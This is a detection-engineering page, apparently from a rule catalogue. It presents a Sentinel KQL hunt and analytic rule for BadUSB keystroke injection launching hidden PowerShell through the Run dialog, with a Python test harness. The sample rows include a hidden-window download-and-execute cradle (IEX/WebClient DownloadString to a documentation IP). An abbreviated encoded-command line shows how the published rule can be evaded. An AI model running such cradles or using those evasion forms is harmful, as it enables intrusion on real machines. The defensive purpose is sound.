
BadUSB HID injection PowerShell via Windows Run dialog

Language: KQL · Severity: MEDIUM · Source: Azure-Sentinel
Techniques: T1059.001, T1564.003, T1200
Table: DeviceProcessEvents
Tags: evasion, hunting, microsoft, official, powershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
Retrieved: 2026-05-27T23:00:00Z · Confidence: medium

Hunt Hypothesis

A BadUSB device enumerates as a keyboard and types keystrokes on the victim's behalf: WIN+R to open the Run dialog, then a PowerShell one-liner, then Enter. Because the Run dialog is hosted by explorer.exe, the resulting powershell.exe or pwsh.exe process has explorer.exe as its parent, and injected payloads almost always add -WindowStyle Hidden plus a flag such as -NoProfile, -EncodedCommand or -ExecutionPolicy Bypass so that no console appears and script policy does not block them (T1200 Hardware Additions, T1059.001 PowerShell, T1564.003 Hidden Window). This hunt looks for that parent-and-flag combination in DeviceProcessEvents. A hit shows suspicious interactive PowerShell execution, not USB origin or persistence by itself; confirm those by correlating with device-connection telemetry and the user's activity at the time.

KQL Query

let timeframe = 1d;
let EvasionFlags = dynamic([
    "-NoProfile",
    "-NonInteractive",
    "-EncodedCommand",
    "DownloadString",
    "IEX",
    "Invoke-Expression",
    "WebClient",
    "Start-Process"
]);
DeviceProcessEvents
| where TimeGenerated >= ago(timeframe)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where InitiatingProcessFileName =~ "explorer.exe"
| where ProcessCommandLine has_all ("-WindowStyle", "Hidden")
| where ProcessCommandLine has_any (EvasionFlags)
    or ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass")
| extend AccountCustomEntity = AccountName
| extend HostCustomEntity    = DeviceName
| project
    TimeGenerated,
    DeviceName,
    HostCustomEntity,
    AccountName,
    AccountCustomEntity,
    AccountDomain,
    ProcessCommandLine,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine,
    ReportId
| sort by TimeGenerated desc
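The hunt's where-clauses can be exercised offline against a handful of process-creation rows before the rule is turned on. The Python below is an added example, not code from this page or from the Azure-Sentinel repository: it ports the predicate literally (kql_has approximates KQL's whole-term, case-insensitive has operator), then adds a hardened variant that resolves the switch abbreviations powershell.exe accepts (-w hidden, -w 1, -nop, -ep bypass, -enc). The minimum prefix lengths come from PowerShell's command-line parser and are an assumption of this example, not something the rule states. The sample rows, device names, account names, 192.0.2.10 and the base64 string are constructed; the second row is a command line the published has_all ("-WindowStyle", "Hidden") clause misses.

```python
"""Run the hunt's predicate over constructed DeviceProcessEvents rows."""
import re
from dataclasses import dataclass

# Same list as the KQL hunt's EvasionFlags.
EVASION_FLAGS = ["-NoProfile", "-NonInteractive", "-EncodedCommand", "DownloadString",
                 "IEX", "Invoke-Expression", "WebClient", "Start-Process"]


@dataclass
class ProcessEvent:
    """Only the DeviceProcessEvents columns the hunt filters on."""
    DeviceName: str
    AccountName: str
    FileName: str
    InitiatingProcessFileName: str
    ProcessCommandLine: str


def kql_has(text: str, term: str) -> bool:
    """Approximate KQL `has`: case-insensitive, and `term` must sit on term
    boundaries, so "IEX" matches 'IEX (New-Object ...)' but not 'reindex'."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(term) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.IGNORECASE) is not None


def has_all(text, terms):
    return all(kql_has(text, t) for t in terms)


def has_any(text, terms):
    return any(kql_has(text, t) for t in terms)


def is_powershell_from_explorer(ev: ProcessEvent) -> bool:
    """FileName in~ ("powershell.exe", "pwsh.exe") and parent =~ "explorer.exe"."""
    return (ev.FileName.lower() in ("powershell.exe", "pwsh.exe")
            and ev.InitiatingProcessFileName.lower() == "explorer.exe")


def matches_hunt(ev: ProcessEvent) -> bool:
    """Literal port of the KQL where-clauses."""
    if not is_powershell_from_explorer(ev):
        return False
    cl = ev.ProcessCommandLine
    if not has_all(cl, ["-WindowStyle", "Hidden"]):
        return False
    return has_any(cl, EVASION_FLAGS) or has_all(cl, ["-ExecutionPolicy", "Bypass"])


def _prefixes(word, min_len):
    return {word[:k] for k in range(min_len, len(word) + 1)}


# powershell.exe accepts any unambiguous prefix of a switch; the minimum forms below
# follow its console-host parser (an assumption of this example, not of the rule).
SWITCH_ALIASES = {
    "windowstyle": _prefixes("windowstyle", 1),                   # -w ... -windowstyle
    "executionpolicy": _prefixes("executionpolicy", 2) | {"ep"},  # -ex, -ep
    "noprofile": _prefixes("noprofile", 3),                       # -nop
    "noninteractive": _prefixes("noninteractive", 4),             # -noni
    "encodedcommand": _prefixes("encodedcommand", 1),             # -e, -enc
}


def switches(cmdline: str) -> dict:
    """Canonical switch name -> the lower-cased token that follows it."""
    tokens = cmdline.split()
    found = {}
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        key = tok.lstrip("-").lower()
        for canonical, aliases in SWITCH_ALIASES.items():
            if key in aliases:
                found[canonical] = tokens[i + 1].lower() if i + 1 < len(tokens) else None
    return found


def matches_hunt_hardened(ev: ProcessEvent) -> bool:
    """Same intent as matches_hunt, but abbreviation-aware."""
    if not is_powershell_from_explorer(ev):
        return False
    sw = switches(ev.ProcessCommandLine)
    if sw.get("windowstyle") not in ("hidden", "1"):  # ProcessWindowStyle.Hidden == 1
        return False
    evasive = any(k in sw for k in ("noprofile", "noninteractive", "encodedcommand"))
    bypass = sw.get("executionpolicy") == "bypass"
    cradle = has_any(ev.ProcessCommandLine,
                     ["DownloadString", "IEX", "Invoke-Expression", "WebClient", "Start-Process"])
    return evasive or bypass or cradle


# Constructed rows, not real telemetry. 192.0.2.10 is a documentation address;
# QQBCAEMA is the base64 of the UTF-16LE string "ABC".
SAMPLE_EVENTS = [
    ProcessEvent("WS-FINANCE-07", "jdoe", "powershell.exe", "explorer.exe",
                 'powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                 '-Command "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/s.ps1\')"'),
    ProcessEvent("WS-HR-12", "asmith", "powershell.exe", "explorer.exe",
                 "powershell -w hidden -nop -ep bypass -enc QQBCAEMA"),  # abbreviated switches
    ProcessEvent("WS-IT-03", "svc_backup", "powershell.exe", "explorer.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),  # visible window
    ProcessEvent("WS-DEV-21", "bwong", "powershell.exe", "cmd.exe",
                 'powershell.exe -WindowStyle Hidden -Command "IEX (gc .\\build.ps1 -Raw)"'),  # not explorer
]


def run_hunt(events):
    """DeviceName -> (original rule hit, hardened rule hit)."""
    return {ev.DeviceName: (matches_hunt(ev), matches_hunt_hardened(ev)) for ev in events}


if __name__ == "__main__":
    for name, (orig, hard) in run_hunt(SAMPLE_EVENTS).items():
        print(f"{name:<14} original={str(orig):<5} hardened={hard}")
```

Running it shows the first row caught by both predicates, the abbreviated WS-HR-12 row caught only by the hardened one, and the last two rows (no hidden window; parent is cmd.exe) caught by neither. The parent check is what ties the rule to the Run dialog; the abbreviation handling is the tuning a practitioner would add before promoting the hunt to an analytic rule.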

Analytic Rule Definition

id: 683b2baa-39c3-457d-b64e-2e57c8fc83ba
name: BadUSB HID injection PowerShell via Windows Run dialog
description: |
  Identifies PowerShell spawned by explorer.exe with a hidden window and a
  remote-execution or evasion flag. Consistent with BadUSB HID injection opening
  the Windows Run dialog via WIN+R; the explorer.exe parent is the keystroke-
  injection signal.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
  - DefenseEvasion
  - InitialAccess
relevantTechniques:
  - T1059.001
  - T1564.003
  - T1200
query: |
  let timeframe = 1d;
  let EvasionFlags = dynamic([
      "-NoProfile",
      "-NonInteractive",
      "-EncodedCommand",
      "DownloadString",
      "IEX",
      "Invoke-Expression",
      "WebClient",
      "Start-Process"
  ]);
  DeviceProcessEvents
  | where TimeGenerated >= ago(timeframe)
  | where FileName in~ ("powershell.exe", "pwsh.exe")
  | where InitiatingProcessFileName =~ "explorer.exe"
  | where ProcessCommandLine has_all ("-WindowStyle", "Hidden")
  | where ProcessCommandLine has_any (EvasionFlags)
      or ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass")
  | extend AccountCustomEntity = AccountName
  | extend HostCustomEntity    = DeviceName
  | project
      TimeGenerated,
      DeviceName,
      HostCustomEntity,
      AccountName,
      AccountCustomEntity,
      AccountDomain,
      ProcessCommandLine,
      InitiatingProcessFileName,
      InitiatingProcessCommandLine,
      ReportId
  | sort by TimeGenerated desc
entityMappings:
  - entityType: Account
    fieldMappings:
      - identifier: Name
        columnName: AccountCustomEntity
      - identifier: NTDomain
        columnName: AccountDomain
  - entityType: Host
    fieldMappings:
      - identifier: HostName
        columnName: HostCustomEntity
version: 1.0.0
metadata:
    source:
        kind: Community
    author:
        name: descambiado
    support:
        tier: Community
    categories:
        domains: [ "Security - Threat Protection" ]

Required Data Sources

Sentinel table        Notes
DeviceProcessEvents   Ensure the Microsoft Defender XDR connector (connectorId MicrosoftThreatProtection, listed under requiredDataConnectors above) is enabled so this table is populated.

MITRE ATT&CK Context

T1200 Hardware Additions (Initial Access): the HID-injection device itself.
T1059.001 Command and Scripting Interpreter: PowerShell (Execution): the injected one-liner run through the Run dialog.
T1564.003 Hide Artifacts: Hidden Window (Defense Evasion): the -WindowStyle Hidden switch that keeps the console off-screen.

False Positive Guidance

explorer.exe is the parent of anything a user launches interactively, not only of Run-dialog commands: desktop and Start-menu shortcuts, Startup-folder .lnk files and double-clicked scripts all produce the same parent. Expect hits from IT-deployed shortcuts and logon helpers that run PowerShell with -WindowStyle Hidden and -ExecutionPolicy Bypass; baseline them on the exact ProcessCommandLine and AccountName rather than excluding whole hosts. The rule also has a known gap: has_all ("-WindowStyle", "Hidden") only matches the spelled-out switch, while powershell.exe accepts abbreviations such as -w hidden, -w 1, -nop, -ep bypass and -enc, so treat the published query as a starting point and tune the command-line terms before relying on it. To raise confidence that a hit came from a USB device, correlate the DeviceName and TimeGenerated of the hit with DeviceEvents rows where ActionType == "PnpDeviceConnected" in the preceding minutes, and check whether the account was physically at the machine.

Original source: https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/DeviceProcess/BadUSBPowerShellRunDialog.yaml